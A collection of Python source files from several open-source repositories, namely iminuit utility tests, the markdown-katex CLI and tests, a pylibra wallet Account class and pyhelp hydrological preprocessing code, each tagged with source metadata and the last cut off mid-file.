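A small worked example of the `next_weekday` helper defined above; note that the `days_ahead <= 0` branch pushes same-day matches a full week ahead, so the result is always strictly after the input date (the dates below are arbitrary):
```python
from datetime import date, timedelta

def next_weekday(d, weekday: int):
    days_ahead = weekday - d.weekday()
    if days_ahead <= 0:
        days_ahead += 7
    return d + timedelta(days=days_ahead)

# 2021-01-01 is a Friday (weekday() == 4); the next Monday (0) is Jan 4.
assert next_weekday(date(2021, 1, 1), 0) == date(2021, 1, 4)
# Asking for Friday again returns the following Friday, not the same day.
assert next_weekday(date(2021, 1, 1), 4) == date(2021, 1, 8)
```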
{
"source": "jnsdrtlf/iminuit",
"score": 2
} |
#### File: iminuit/tests/test_util.py
```python
from iminuit import util
import pytest
from argparse import Namespace
from numpy.testing import assert_equal, assert_allclose
import numpy as np
from iminuit._core import MnUserParameterState
def test_ndim():
ndim = util._ndim
assert ndim(1) == 0
assert ndim([]) == 1
assert ndim([[]]) == 2
assert ndim(None) == 0
assert ndim((None, None)) == 1
assert ndim(((1, 2), None)) == 2
assert ndim((None, (1, 2))) == 2
def test_ValueView():
state = MnUserParameterState()
state.add("x", 1.0, 0.1)
state.add("y", 2.2, 0.1)
state.add("z", 3.3, 0.1)
v = util.ValueView(
Namespace(
_var2pos={"x": 0, "y": 1, "z": 2},
_pos2var=("x", "y", "z"),
npar=3,
_last_state=state,
_copy_state_if_needed=lambda: None,
)
)
assert repr(v) == "<ValueView x=1.0 y=2.2 z=3.3>"
assert str(v) == repr(v)
v[:] = (1, 2, 3)
assert_equal(v, (1, 2, 3))
v[1:] = 4
assert_equal(v, (1, 4, 4))
v["y"] = 2
assert_equal(v, (1, 2, 4))
v["y":] = 3
assert_equal(v, (1, 3, 3))
v[:"z"] = 2
assert_equal(v, (2, 2, 3))
def test_Matrix():
m = util.Matrix(("a", "b"))
m[:] = [[1, 1], [1, 4]]
assert_equal(m, ((1, 1), (1, 4)))
assert repr(m) == "[[1. 1.]\n [1. 4.]]"
c = m.correlation()
assert_allclose(c, ((1.0, 0.5), (0.5, 1.0)))
assert m["a", "b"] == 1.0
assert m["a", 1] == 1.0
assert m[1, 1] == 4.0
assert_equal(m["b"], (1, 4))
m *= 2
assert_equal(m, ((2, 2), (2, 8)))
assert_allclose(np.dot(m, (1, 1)), (4, 10))
with pytest.raises(TypeError):
util.Matrix("ab")
with pytest.raises(TypeError):
util.Matrix(1)
def test_Param():
values = 3, "foo", 1.2, 3.4, None, False, False, True, True, False, 42, None
p = util.Param(*values)
assert p.number == 3
assert p.name == "foo"
assert p.value == 1.2
assert p.error == 3.4
assert p.merror is None
assert p.is_const == False
assert p.is_fixed == False
assert p.has_limits == True
assert p.has_lower_limit is True
assert p.has_upper_limit is False
assert p.lower_limit == 42
assert p.upper_limit is None
assert repr(p) == (
"Param(number=3, name='foo', value=1.2, error=3.4, merror=None, "
"is_const=False, is_fixed=False, has_limits=True, has_lower_limit=True, "
"has_upper_limit=False, lower_limit=42, upper_limit=None)"
)
def test_Params():
p = util.Params(
[
util.Param(
0, "foo", 1.2, 3.4, None, False, False, True, True, False, 42, None
),
util.Param(
1, "bar", 3.4, 4.5, None, False, False, True, True, False, 42, None
),
]
)
assert repr(p) == repr((p[0], p[1]))
assert p[0].number == 0
assert p[1].number == 1
assert p["foo"].number == 0
assert p["bar"].number == 1
def test_MError():
me = util.MError(
1,
"x",
0.1,
0.2,
True,
True,
True,
False,
False,
False,
False,
False,
False,
11,
0.7,
)
assert repr(me) == (
"<MError number=1 name='x' lower=0.1 upper=0.2 is_valid=True lower_valid=True "
"upper_valid=True at_lower_limit=False at_upper_limit=False "
"at_lower_max_fcn=False at_upper_max_fcn=False lower_new_min=False "
"upper_new_min=False nfcn=11 min=0.7>"
)
assert me == util.MError(
1,
"x",
0.1,
0.2,
True,
True,
True,
False,
False,
False,
False,
False,
False,
11,
0.7,
)
assert me != util.MError(
1,
"x",
0.1,
0.2,
True,
True,
True,
False,
False,
False,
False,
False,
False,
11,
0.8,
)
def test_MErrors():
mes = util.MErrors(
x=util.MError(
1,
"x",
0.1,
0.2,
True,
True,
True,
False,
False,
False,
False,
False,
False,
11,
0.7,
)
)
assert repr(mes) == f"<MErrors\n {mes['x']!r}\n>"
def test_FMin():
fm = Namespace(
fval=1.23456e-10,
edm=1.23456e-10,
errordef=0.5,
is_valid=True,
has_valid_parameters=True,
has_accurate_covar=True,
has_posdef_covar=True,
has_made_posdef_covar=False,
hesse_failed=False,
has_covariance=True,
is_above_max_edm=False,
has_reached_call_limit=False,
has_parameters_at_limit=False,
state=[],
)
fmin = util.FMin(fm, 1, 2, 0.1)
assert {x for x in dir(fmin) if not x.startswith("_")} == {
"edm",
"edm_goal",
"errordef",
"fval",
"nfcn",
"ngrad",
"is_valid",
"has_accurate_covar",
"has_valid_parameters",
"has_posdef_covar",
"has_made_posdef_covar",
"hesse_failed",
"has_covariance",
"is_above_max_edm",
"has_reached_call_limit",
"has_parameters_at_limit",
}
assert fmin.edm == 1.23456e-10
assert fmin.edm_goal == 0.1
assert fmin.has_parameters_at_limit == False
assert fmin == util.FMin(fm, 1, 2, 0.1)
assert fmin != util.FMin(fm, 1, 2, 0.3)
assert repr(fmin) == (
"<FMin edm=1.23456e-10 edm_goal=0.1 errordef=0.5 fval=1.23456e-10"
" has_accurate_covar=True has_covariance=True has_made_posdef_covar=False"
" has_parameters_at_limit=False has_posdef_covar=True"
" has_reached_call_limit=False has_valid_parameters=True"
" hesse_failed=False is_above_max_edm=False is_valid=True"
" nfcn=1 ngrad=2>"
)
def test_normalize_limit():
assert util._normalize_limit(None) == (-util.inf, util.inf)
assert util._normalize_limit((None, 2)) == (-util.inf, 2)
assert util._normalize_limit((2, None)) == (2, util.inf)
assert util._normalize_limit((None, None)) == (-util.inf, util.inf)
with pytest.raises(ValueError):
util._normalize_limit((3, 2))
def test_guess_initial_step():
assert util._guess_initial_step(0) == 0.1
assert util._guess_initial_step(1) == 0.01
def test_address_of_cfunc():
nb = pytest.importorskip("numba")
nb_sig = nb.types.double(nb.types.uintc, nb.types.CPointer(nb.types.double))
@nb.cfunc(nb_sig)
def fcn(n, x):
x = nb.carray(x, (n,))
r = 0.0
for i in range(n):
r += (x[i] - i) ** 2
return r
from ctypes import cast, c_void_p, CFUNCTYPE, POINTER, c_double, c_uint32
address = cast(fcn.ctypes, c_void_p).value
assert util._address_of_cfunc(fcn) == address
# let's see if we can call the function pointer, going full circle
c_sig = CFUNCTYPE(c_double, c_uint32, POINTER(c_double))
c_fcn = cast(address, c_sig)
v = np.array((1.0, 2.0))
assert c_fcn(2, v.ctypes.data_as(POINTER(c_double))) == 2.0
def test_address_of_cfunc_bad_signature():
nb = pytest.importorskip("numba")
nb_sig = nb.types.double(nb.types.double, nb.types.CPointer(nb.types.double))
@nb.cfunc(nb_sig)
def fcn(y, x):
return 0
assert util._address_of_cfunc(fcn) == 0
``` |
{
"source": "jnsdrtlf/markdown-katex",
"score": 3
} |
#### File: src/markdown_katex/__main__.py
```python
import sys
import json
import typing as typ
import subprocess as sp
import markdown_katex
from markdown_katex import html
try:
import pretty_traceback
pretty_traceback.install()
except ImportError:
pass # no need to fail because of missing dev dependency
ExitCode = int
def _selftest() -> ExitCode:
# pylint:disable=import-outside-toplevel ; lazy import to improve cli responsiveness
from markdown_katex import wrapper
print("Command options:")
print(json.dumps(wrapper.parse_options(), indent=4))
print()
html_parts: typ.List[str] = []
test_formulas = markdown_katex.TEST_FORMULAS
for tex_formula in test_formulas:
html_part = wrapper.tex2html(tex_formula)
if not html_part:
return 1
html_parts.append(html_part)
formula_html = "\n<hr/>\n".join(html_parts)
html_text = html.HTML_TEMPLATE.replace("{{content}}", formula_html)
with open("test.html", mode="wb") as fobj:
fobj.write(html_text.encode("utf-8"))
print("Created 'test.html'")
return 0
def main(args: typ.Sequence[str] = sys.argv[1:]) -> ExitCode:
"""Basic wrapper around the katex command.
This is mostly just used for self testing.
$ python -m markdown_katex
"""
# pylint:disable=dangerous-default-value ; mypy will catch mutations of args
if "--markdown-katex-selftest" in args:
return _selftest()
bin_cmd = markdown_katex.get_bin_cmd()
if "--version" in args or "-V" in args:
version = markdown_katex.__version__
bin_str = " ".join(bin_cmd)
print("markdown-katex version: ", version, f"(using binary: {bin_str})")
return sp.check_call(bin_cmd + list(args))
if __name__ == '__main__':
sys.exit(main())
```
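A minimal sketch of driving the same entry point programmatically instead of via `python -m markdown_katex`; the explicit argument list stands in for `sys.argv[1:]`:
```python
from markdown_katex.__main__ import main

# Runs the self-test branch above and writes 'test.html' from TEST_FORMULAS.
exit_code = main(["--markdown-katex-selftest"])
print("self-test exit code:", exit_code)
```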
#### File: markdown-katex/test/test_mdkatex.py
```python
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
import io
import re
import tempfile
import textwrap
from xml.etree.ElementTree import XML
import bs4
import pytest
import markdown as md
import pathlib2 as pl
import markdown_katex
import markdown_katex.wrapper as wrp
import markdown_katex.extension as ext
DATA_DIR = pl.Path(__file__).parent.parent / "fixture_data"
DATA_DIR.mkdir(parents=True, exist_ok=True)
TMP_DIR = pl.Path(tempfile.gettempdir()) / "mdkatex"
BASIC_TEX_TXT = r"""
f(x) = \int_{-\infty}^\infty
\hat f(\xi)\,e^{2 \pi i \xi x}
\,d\xi
"""
TEX_WITH_SVG_OUTPUT = "\\utilde{AB}"
BASIC_BLOCK_TXT = "```math\n" + BASIC_TEX_TXT + "```"
DEFAULT_MKDOCS_EXTENSIONS = ['meta', 'toc', 'tables', 'fenced_code']
EXTENDED_BLOCK_TXT = r"""
# Heading
prelude
```math
{0}
```
postscript
"""
EXTENDED_HTML_TEMPLATE = r"""
<h1 id="heading">Heading</h1>
<p>prelude</p>
<p>{0}</p>
<p>postscript</p>
"""
@pytest.fixture()
def katex_output():
path = DATA_DIR / "katex_output.html"
with path.open(mode="r") as fobj:
return fobj.read()
def test_svg2img(katex_output):
assert "<svg" in katex_output
assert "</svg>" in katex_output
assert "<img" not in katex_output
result = ext.svg2img(katex_output)
assert "<img" in result
out_path = DATA_DIR / "katex_output_no_inline_svg.html"
with out_path.open(mode="w") as fobj:
fobj.write(result)
def test_regexp():
assert ext.MATH_FENCE_RE.match(BASIC_BLOCK_TXT)
alt_block_text = BASIC_BLOCK_TXT.replace("```", "~~~")
assert ext.MATH_FENCE_RE.match(alt_block_text)
INLINE_TEST_CASES = {
"1 pre `a+b` post" : [],
"2 pre $`a+b` post" : [],
"3 pre `a+b`$ post" : [],
"4 pre $`a+b`$ post" : ["$`a+b`$"],
"5 pre $``a+b``$ post" : ["$``a+b``$"],
"6 pre``$`a+b`$`` post": [],
"7 pre``$`a+b`$`` post": [],
# multimatch
"1 pre $a+b`$ inter $c+d`$ post" : [],
"2 pre $`a+b`$ inter $`c+d`$ post" : ["$`a+b`$", "$`c+d`$"],
"3 pre $``a+b``$ inter $``c+d``$ post": ["$``a+b``$", "$``c+d``$"],
}
@pytest.mark.parametrize("line, expected", INLINE_TEST_CASES.items())
def test_inline_parsing(line, expected):
result = [code_item.inline_text for code_item in ext.iter_inline_katex(line)]
assert result == expected
def test_inline_multiple():
md_text = textwrap.dedent(
"""
# headline
Pre $`a+b`$ inter 1 $`c+d`$ inter 2 $`e+f`$ post
"""
)
result = md.markdown(md_text, extensions=['markdown_katex'])
assert "tmp_md_katex" not in result
assert result.strip().startswith(ext.KATEX_STYLES.strip())
# check that spans were added
assert result.count('<span class="katex"><') == 3
# check that markers were replaced
assert '<span class="katex">katex' not in result
def test_determinism():
html_data1 = markdown_katex.tex2html(BASIC_TEX_TXT)
html_data2 = markdown_katex.tex2html(BASIC_TEX_TXT)
assert html_data1 == html_data2
def test_tex2html():
assert len(markdown_katex.TEST_FORMULAS) > 1
for formula in markdown_katex.TEST_FORMULAS:
md_text = "```math\n{0}\n```".format(formula)
html_text = ext.md_block2html(md_text)
assert html_text.startswith('<span class="katex-display"')
assert html_text.endswith("</span>")
md_text = "$`{0}`$".format(formula)
html_text = ext.md_inline2html(md_text)
assert html_text.startswith('<span class="katex"')
assert html_text.endswith("</span>")
def test_basic_block():
html_data = markdown_katex.tex2html(BASIC_TEX_TXT)
# with open("debug_output_katex.html", mode="w") as fobj:
# fobj.write(html_data)
assert '<span class="katex' in html_data
no_inline_svg = ext.md_block2html(BASIC_BLOCK_TXT, default_options={'no_inline_svg': False})
default_output = ext.md_block2html(BASIC_BLOCK_TXT)
assert no_inline_svg == default_output
assert default_output
assert default_output.startswith('<span class="katex-display"')
expected = "<p>{}</p>".format(default_output)
result = md.markdown(BASIC_BLOCK_TXT, extensions=['markdown_katex'])
assert "tmp_md_katex" not in result
assert default_output in result
assert result.strip().startswith(ext.KATEX_STYLES.strip())
assert result.endswith(expected)
BASIC_TEX = r"e^{2 \pi i \xi x}"
INLINE_MD_TMPL = """
# Headline
prelude {0} interlude {1} postscript.
"""
def test_inline_basic():
inline_txt = "$`" + BASIC_TEX + "`$"
inline_output = ext.md_inline2html(inline_txt)
assert '<span class="katex"' in inline_output
inline_md_txt = INLINE_MD_TMPL.format(inline_txt, inline_txt)
result = md.markdown(inline_md_txt, extensions=['markdown_katex'])
assert "tmp_md_katex" not in result
assert '<span class="katex"' in result
assert "Headline" in result
assert "prelude" in result
assert "interlude" in result
assert "postscript" in result
assert result.count(inline_output) == 2
assert result.strip().startswith(ext.KATEX_STYLES.strip())
def test_trailing_whitespace():
default_output = ext.md_block2html(BASIC_BLOCK_TXT)
trailing_space_result = md.markdown(BASIC_BLOCK_TXT + " ", extensions=['markdown_katex'])
assert "tmp_md_katex" not in trailing_space_result
assert default_output in trailing_space_result
assert "```" not in trailing_space_result
def test_inline_quoted():
inline_txt = "$`" + BASIC_TEX + "`$"
quoted_inline_txt = "``$`" + BASIC_TEX + "`$``"
inline_output = ext.md_inline2html(inline_txt)
inline_md_txt = INLINE_MD_TMPL.format(inline_txt, quoted_inline_txt)
result = md.markdown(inline_md_txt, extensions=['markdown_katex'])
assert "tmp_md_katex" not in result
assert result.count(inline_output) == 1
assert "span id=\"katex" not in result
inline_md_txt = INLINE_MD_TMPL.format(quoted_inline_txt, inline_txt)
result = md.markdown(inline_md_txt, extensions=['markdown_katex'])
assert "tmp_md_katex" not in result
assert result.count(inline_output) == 1
assert "span id=\"katex" not in result
def test_marker_uniqueness():
inline_md_txt = "\n\n".join(
["start", "$`a+b`$", "interlude", "$``c+d``$", "interlude", "$``a+b``$", "end"]
)
md_ctx = md.Markdown(extensions=['markdown_katex'])
preproc = next(
iter((pp for pp in md_ctx.preprocessors if isinstance(pp, ext.KatexPreprocessor)))
)
out_lines = preproc.run(inline_md_txt.splitlines())
md_output = "\n".join(out_lines)
assert md_output.count("span id=\"tmp_md_katex") == 3
marker_ids = [
match.group(1) for match in re.finditer(r"span id=\"tmp_md_katex(\d+)", md_output)
]
assert len(set(marker_ids)) == 2
def test_svg_uniqueness():
md_text = "\n\n".join(
[
"start",
"$`a+b`$",
"interlude",
"$`c+d`$",
"interlude",
"```math\na+b\n```",
"interlude",
"```math\ne+f\n```",
"interlude",
"```math\na+b\n```",
"interlude",
"prefix $`a+b`$ suffix",
"end",
]
)
html_output = md.markdown(md_text, extensions=['markdown_katex'])
assert "tmp_md_katex" not in html_output
# check whitespace
assert "prefix <span " in html_output
assert "</span> suffix" in html_output
fobj = io.StringIO(html_output)
soup = bs4.BeautifulSoup(fobj, "html.parser")
results = set()
for tag in soup.find_all("span", attrs={'class': "katex"}):
results.add(str(tag))
assert len(results) == 4
def test_no_inline_svg():
inline_md_txt = "$`" + TEX_WITH_SVG_OUTPUT + "`$"
inline_output = ext.md_inline2html(inline_md_txt)
assert '<span class="katex"' in inline_output
assert "<svg" in inline_output
assert "<img" not in inline_output
inline_output = ext.md_inline2html(inline_md_txt, default_options={'no_inline_svg': True})
assert '<span class="katex"' in inline_output
assert "<svg" not in inline_output
assert "<img" in inline_output
result = md.markdown(
INLINE_MD_TMPL.format(inline_md_txt, inline_md_txt),
extensions=['markdown_katex'],
extension_configs={'markdown_katex': {'no_inline_svg': True}},
)
assert "tmp_md_katex" not in result
assert '<span class="katex"' in result
assert "<svg" not in result
assert "<img" in result
def test_insert_fonts_css():
result = md.markdown(
BASIC_BLOCK_TXT,
extensions=['markdown_katex'],
extension_configs={'markdown_katex': {'insert_fonts_css': True}},
)
assert "tmp_md_katex" not in result
assert result.startswith(ext.KATEX_STYLES.strip())
result = md.markdown(
BASIC_BLOCK_TXT,
extensions=['markdown_katex'],
extension_configs={'markdown_katex': {'insert_fonts_css': False}},
)
assert "tmp_md_katex" not in result
assert not result.startswith(ext.KATEX_STYLES.strip())
def test_err_msg():
invalid_md_txt = r"$`e^{2 \pi i \xi x`$"
md_txt = INLINE_MD_TMPL.format(invalid_md_txt, invalid_md_txt)
try:
md.markdown(md_txt, extensions=['markdown_katex'])
assert False, "expected an exception"
except wrp.KatexError as err:
err_msg = err.args[0]
assert "ParseError: KaTeX parse error:" in err_msg
assert "Expected '}'" in err_msg
def test_bin_paths():
assert wrp._get_pkg_bin_path().exists()
assert wrp._get_pkg_bin_path(machine="x86_64", osname="Windows").exists()
assert wrp._get_pkg_bin_path(machine="AMD64", osname="Windows").exists()
assert wrp._get_pkg_bin_path(machine="x86_64", osname="Linux").exists()
assert wrp._get_pkg_bin_path(machine="x86_64", osname="Darwin").exists()
assert str(wrp._get_pkg_bin_path(machine="AMD64", osname="Windows")).endswith(".exe")
def test_html_output():
# NOTE: This generates html that is to be tested
# in the browser (for warnings in devtools).
assert len(markdown_katex.TEST_FORMULAS) > 1
md_parts = []
for formula in markdown_katex.TEST_FORMULAS:
inline_formula = formula.replace("\n", " ").strip()
md_parts.append("Inline: $`" + inline_formula + "`$")
md_parts.append("\n\n---\n\n```math" + formula + "\n```")
md_text = "# Headline\n\n" + "\n".join(md_parts)
result = md.markdown(
md_text,
extensions=DEFAULT_MKDOCS_EXTENSIONS + ['markdown_katex'],
extension_configs={'markdown_katex': {'no_inline_svg': True}},
)
assert "tmp_md_katex" not in result
html = """
<html>
<head>
<style>
body {
background: white;
}
@media print {
@page {
/* A4 - landscape */
padding: 0;
margin: 20mm;
size: 297mm 210mm;
}
}
</style>
</head>
<body>
{{result}}
</body>
</html>
"""
html = textwrap.dedent(html.lstrip("\n"))
html = html.replace("{{result}}", result)
tmp_file = TMP_DIR / "test_output.html"
with tmp_file.open(mode="w", encoding="utf-8") as fobj:
fobj.write(html)
def test_valid_xml():
md_text = textwrap.dedent(
r"""
Look at these formulas:
```math
f(x) = 0
```
"""
)
extensions = DEFAULT_MKDOCS_EXTENSIONS + ['markdown_katex']
result = md.markdown(
md_text,
extensions=extensions,
extension_configs={'markdown_katex': {'no_inline_svg': True}},
)
# avoid xml.etree.ElementTree.ParseError: junk after document element:
# XML expects a single root object containing all the others
result = "<div>" + result + "</div>"
# assert no exception
XML(result)
def test_ignore_in_non_math_block():
md_text = textwrap.dedent(
r"""
Look at these formulas:
```
This math is in a block $`a^2+b^2=c^2`$.
```
And also this code:
```python
def randint() -> int:
return 4
```
And this code:
~~~javascript
function randint() {
return 4;
}
~~~
"""
)
result_a = md.markdown(
md_text,
extensions=DEFAULT_MKDOCS_EXTENSIONS + ['markdown_katex'],
extension_configs={'markdown_katex': {'no_inline_svg': True}},
)
result_b = md.markdown(
md_text,
extensions=DEFAULT_MKDOCS_EXTENSIONS,
)
assert "tmp_md_katex" not in result_a
assert "tmp_md_katex" not in result_b
assert "katex" not in result_a
assert "katex" not in result_b
assert result_a == result_b
assert "<pre><code>This math is in" in result_a
assert re.search(r'<pre><code class="(language-)?python">def randint', result_a)
assert re.search(r'<pre><code class="(language-)?javascript">function randint', result_a)
def test_macro_file():
md_text = textwrap.dedent(
"""
prelude
```math
\\macroname{aaaAAA}{bbbBBB}
```
postscript
"""
)
macro_text = textwrap.dedent(
"""
% macros.tex
\\macroname:\\text{prefix} \\text{#2} \\text{interlude} \\text{#1} \\text{suffix}
"""
)
with tempfile.NamedTemporaryFile(suffix=".tex") as fobj:
fobj.write(macro_text.encode("ascii"))
fobj.flush()
macro_file = fobj.name
result = md.markdown(
md_text,
extensions=DEFAULT_MKDOCS_EXTENSIONS + ['markdown_katex'],
extension_configs={'markdown_katex': {'no_inline_svg': True, 'macro-file': macro_file}},
)
assert "tmp_md_katex" not in result
assert "prefix" in result
assert "interlude" in result
assert "suffix" in result
assert result.index("bbbBBB") < result.index("aaaAAA")
def test_md_in_html():
md_text = textwrap.dedent(
"""
<div markdown="1">
```math
a^2+b^2=c^2
```
$`a^3+b^3=c^3`$
</div>
"""
)
result = md.markdown(
md_text,
extensions=DEFAULT_MKDOCS_EXTENSIONS + ['markdown_katex', 'extra'],
extension_configs={'markdown_katex': {'no_inline_svg': True}},
)
assert "tmp_md_katex" not in result
assert '<span class="katex-display">' in result
assert '<span class="katex">' in result
``` |
{
"source": "jnsead/pylibra",
"score": 3
} |
#### File: pylibra/wallet/account.py
```python
from sha3 import sha3_256
from nacl.signing import SigningKey
class Account(object):
def __init__(self, private_key):
self._signing_key = SigningKey(bytes.fromhex(private_key))
self._verify_key = self._signing_key.verify_key
shazer = sha3_256()
shazer.update(self._verify_key.encode())
self.address = shazer.digest().hex()
def sign(self, message):
return self._signing_key.sign(message)
@property
def public_key(self):
return self._verify_key.encode().hex()
@property
def private_key(self):
return self._signing_key.encode().hex()
``` |
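A short usage sketch for `Account`; the hex private key below is a made-up 32-byte value, not a real key:
```python
# 32 bytes of dummy key material, hex encoded (64 hex characters).
account = Account("11" * 32)

signed = account.sign(b"transfer 100 coins")
print(account.address)          # sha3-256 digest of the ed25519 public key
print(account.public_key)       # hex-encoded verify key
print(signed.signature.hex())   # detached signature bytes
```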
{
"source": "jnsebgosselin/help",
"score": 3
} |
#### File: help/pyhelp/preprocessing.py
```python
import csv
import time
import os.path as osp
import multiprocessing as mp
from multiprocessing import Pool
MINEDEPTH = 3
MAXEDEPTH = 80
MINTHICK = 10
# ---- Evapotranspiration and Soil and Design data (D10 and D11)
def _format_d11_singlecell(row):
"""
Format the D11 input data for a single cell (one row in the excel file).
"""
nlayers = int(row['nlayer'])
if nlayers == 0:
# This means this cell cannot be run in HELP.
return None
iu11 = 2
try:
city = str(int(row['cid']))
except ValueError:
city = str(row['cid'])
ulat = float(row['lat_dd'])
ipl = int(row['growth_start'])
ihv = int(row['growth_end'])
ulai = float(row['LAI'])
edepth = float(row['EZD'])
edepth = min(max(edepth, MINEDEPTH), MAXEDEPTH)
wind = float(row['wind'])
hum1 = float(row['hum1'])
hum2 = float(row['hum2'])
hum3 = float(row['hum3'])
hum4 = float(row['hum4'])
d11dat = []
# READ (11, 5050) IU11, CITY11
# 5050 FORMAT (I2/A40)
d11dat.append(['{0:>2}'.format(iu11)])
d11dat.append(['{0:<40}'.format(city)])
# READ (11, 5060) ULAT, IPL, IHV, ULAI, EDEPTH, WIND, HUM1, HUM2,
# HUM3, HUM4
# 5060 FORMAT (F10.2,I4,I4,F7.0,F8.0,5F5.0)
d11dat.append(['{0:<10.2f}'.format(ulat) +
'{0:>4}'.format(ipl) +
'{0:>4}'.format(ihv) +
'{0:>7.2f}'.format(ulai) +
'{0:>8.1f}'.format(edepth) +
'{0:>5.1f}'.format(wind) +
'{0:>5.1f}'.format(hum1) +
'{0:>5.1f}'.format(hum2) +
'{0:>5.1f}'.format(hum3) +
'{0:>5.1f}'.format(hum4)])
return d11dat
def _format_d10_singlecell(row):
"""
Format the D10 input data for a single cell (corresponds to a single row
in the input csv file).
"""
nlayers = int(row['nlayer'])
if nlayers == 0:
# This means this cell cannot be run in HELP.
return None
try:
title = str(int(row['cid']))
except ValueError:
title = str(row['cid'])
iu10 = 2
ipre = 0
irun = 1
osno = 0 # initial snow water
area = 6.25 # area projected on horizontal plane
frunof = 100
runof = float(row['CN'])
d10dat = []
# READ (10, 5070) TITLE
# 5070 FORMAT(A60)
d10dat.append(['{0:<60}'.format(title)])
# READ (10, 5080) IU10, IPRE, OSNO, AREA, FRUNOF, IRUN
# 5080 FORMAT(I2,I2,2F10.0,F6.0,I2)
d10dat.append(['{0:>2}'.format(iu10) +
'{0:>2}'.format(ipre) +
'{0:>10.0f}'.format(osno) +
'{0:>10.0f}'.format(area) +
'{0:>6.0f}'.format(frunof) +
'{0:>2}'.format(irun)])
# IF (IRUN .EQ. 1) READ (10, 5090) CN2
# 5090 FORMAT(F7.0)
d10dat.append(['{0:>7.0f}'.format(runof)])
# Format the layer properties.
for i in range(nlayers):
lay = str(i+1)
layer = int(row['lay_type'+lay])
thick = max(float(row['thick'+lay]), MINTHICK)
isoil = 0
poro = float(row['poro'+lay])
fc = float(row['fc'+lay])
wp = float(row['wp'+lay])
sw = ''
rc = float(row['ksat'+lay])
xleng = float(row['dist_dr'+lay])
slope = float(row['slope'+lay])
# Check that all values are valid for the layer.
check = [val == -9999 for val in
(thick, poro, fc, wp, rc, xleng, slope)]
if any(check):
return None
# READ (10, 5120) LAYER (J), THICK (J), ISOIL (J),
# PORO (J), FC (J), WP (J), SW (J), RC (J)
# 5120 FORMAT(I2,F7.0,I4,4F6.0,F16.0)
d10dat.append(['{0:>2}'.format(layer) +
'{0:>7.0f}'.format(thick) +
'{0:>4}'.format(isoil) +
'{0:>6.3f}'.format(poro) +
'{0:>6.3f}'.format(fc) +
'{0:>6.3f}'.format(wp) +
'{0:>6}'.format(sw) +
'{0:>16.14f}'.format(rc)])
recir = subin = phole = defec = ipq = trans = ''
layr = 0
# READ (10, 5130) XLENG (J), SLOPE (J), RECIR (J), LAYR (J),
# SUBIN (J), PHOLE (J), DEFEC (J), IPQ (J), TRANS (J)
# 5130 FORMAT(F7.0,2F6.0,I3,F13.0,2F7.0,I2,G14.6)
d10dat.append(['{0:>7.0f}'.format(xleng) +
'{0:>6.2f}'.format(slope) +
'{0:>6}'.format(recir) +
'{0:>3}'.format(layr) +
'{0:>13}'.format(subin) +
'{0:>7}'.format(phole) +
'{0:>7}'.format(defec) +
'{0:>2}'.format(ipq) +
'{0:>14}'.format(trans)])
return d10dat
def format_d10d11_inputs(grid, cellnames):
"""
Format the evapotranspiration (D11) and soil and design data (D10) in a
format that is compatible with HELP.
"""
tic = time.perf_counter()
d11dat = {}
d10dat = {}
N = len(cellnames)
for i, cid in enumerate(cellnames):
print("\rFormatting D10 and D11 data for cell %d of %d (%0.1f%%)" %
(i+1, N, (i+1)/N*100), end=' ')
row = grid.loc[cid]
d11dat[cid] = _format_d11_singlecell(row)
d10dat[cid] = _format_d10_singlecell(row)
print("\rFormatting D10 and D11 data for cell %d of %d (%0.1f%%)" %
(i+1, N, (i+1)/N*100))
tac = time.perf_counter()
print('Task completed in %0.2f sec' % (tac-tic))
warnings = [cid for cid, val in d10dat.items() if val is None]
if warnings:
print('-' * 25)
msg = "Warning: the data for "
msg += "cell " if len(warnings) == 1 else "cells "
msg += ", ".join(warnings)
msg += " are not formatted correctly."
print(msg)
print('-' * 25)
return d10dat, d11dat
def write_d10d11_singlecell(packed_data):
"""Write the content of cell in a D10 and D11 file."""
fname, cid, d10data = packed_data
if d10data is None:
fname = None
else:
with open(fname, 'w') as csvfile:
writer = csv.writer(csvfile, lineterminator='\n')
writer.writerows(d10data)
return {cid: fname}
def write_d10d11_allcells(dirpath, d10data, d11data, ncore=None):
"""
Write the content of each cell in individual D10 and D11 files.
"""
ncore = max(mp.cpu_count() if ncore is None else ncore, 1)
pool = Pool(ncore)
# Prepare soil and design input files (D10).
tic = time.perf_counter()
iterable = [(osp.join(dirpath, str(cid) + '.D10'), cid, d10data[cid]) for
cid in d10data.keys()]
d10_connect_table = {}
calcul_progress = 0
N = len(iterable)
for i in pool.imap_unordered(write_d10d11_singlecell, iterable):
d10_connect_table.update(i)
calcul_progress += 1
progress_pct = calcul_progress/N*100
print("\rCreating D10 input file for cell %d of %d (%0.1f%%)" %
(calcul_progress, N, progress_pct), end=' ')
tac = time.perf_counter()
print('\nTask completed in %0.2f sec' % (tac-tic))
# Prepare evapotranspiration input files (D11).
tic = time.perf_counter()
iterable = [(osp.join(dirpath, str(cid) + '.D11'), cid, d11data[cid]) for
cid in d10data.keys()]
d11_connect_table = {}
calcul_progress = 0
N = len(iterable)
for i in pool.imap_unordered(write_d10d11_singlecell, iterable):
d11_connect_table.update(i)
calcul_progress += 1
progress_pct = calcul_progress/N*100
print("\rCreating D11 input file for cell %d of %d (%0.1f%%)" %
(calcul_progress, N, progress_pct), end=' ')
tac = time.perf_counter()
print('\nTask completed in %0.2f sec' % (tac-tic))
return d10_connect_table, d11_connect_table
```
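A hypothetical driver for the two helpers above; `grid` is assumed to be a pandas DataFrame indexed by cell id that carries the columns referenced in `_format_d10_singlecell` and `_format_d11_singlecell` (nlayer, cid, lat_dd, CN, lay_type1, thick1, and so on), and the file name and output directory are placeholders:
```python
import os
import pandas as pd

# One row per cell, indexed by the cell id but keeping 'cid' as a column.
grid = pd.read_csv("input_grid.csv")
grid = grid.set_index("cid", drop=False)

cellnames = grid.index.tolist()
d10data, d11data = format_d10d11_inputs(grid, cellnames)

os.makedirs("help_input_files", exist_ok=True)
d10_files, d11_files = write_d10d11_allcells(
    "help_input_files", d10data, d11data, ncore=4)
```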
#### File: help/pyhelp/processing.py
```python
import os
import os.path as osp
from multiprocessing import Pool
import multiprocessing as mp
import time
import csv
import calendar
# ---- Third Party imports
import numpy as np
# ---- Local Libraries Imports
from pyhelp import HELP3O
DEL_TEMPFILES = True
# ---- Run HELP
def run_help_singlecell(item):
"""Run HELP for a single cell."""
cellname, outparam = item
HELP3O.run_simulation(*outparam)
results = read_monthly_help_output(outparam[5])
if DEL_TEMPFILES:
os.remove(outparam[5])
return (cellname, results)
def run_help_allcells(cellparams, ncore=None):
"""Run HELP in batch for multiple cells."""
